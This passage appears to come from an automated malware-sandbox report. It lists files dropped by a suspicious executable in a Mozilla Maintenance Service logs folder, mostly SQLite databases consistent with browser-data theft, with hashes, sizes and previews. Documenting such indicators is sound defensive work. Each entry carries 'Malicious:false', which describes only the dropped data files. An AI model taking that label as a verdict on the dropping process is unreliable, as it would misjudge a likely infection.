                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):25
                                                                    Entropy (8bit):4.083856189774724
                                                                    Encrypted:false
                                                                    SSDEEP:3:alaWrdQn/C:WaWrdy/C
                                                                    MD5:A1A4760588A5D2F0E0BE0F73E67FBB42
                                                                    SHA1:8A102BD0D596A414EC3081ECB8E4AD698E849C2C
                                                                    SHA-256:110053A572D3B302F45F7FAA313A7F4844039791AEFD9101EC3849ADF99EF5F7
                                                                    SHA-512:FC28776AB48617308027C814C51BE80E98A16D054F42A08E70596FB09BC6AB97DA2F4F4559DC9DC36D236DE5E84CB321751320019240CEAF5439064ADA737B3F
                                                                    Malicious:false
                                                                    Preview:48Crrqo0gnv2mVSEvjvx5BVvg
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
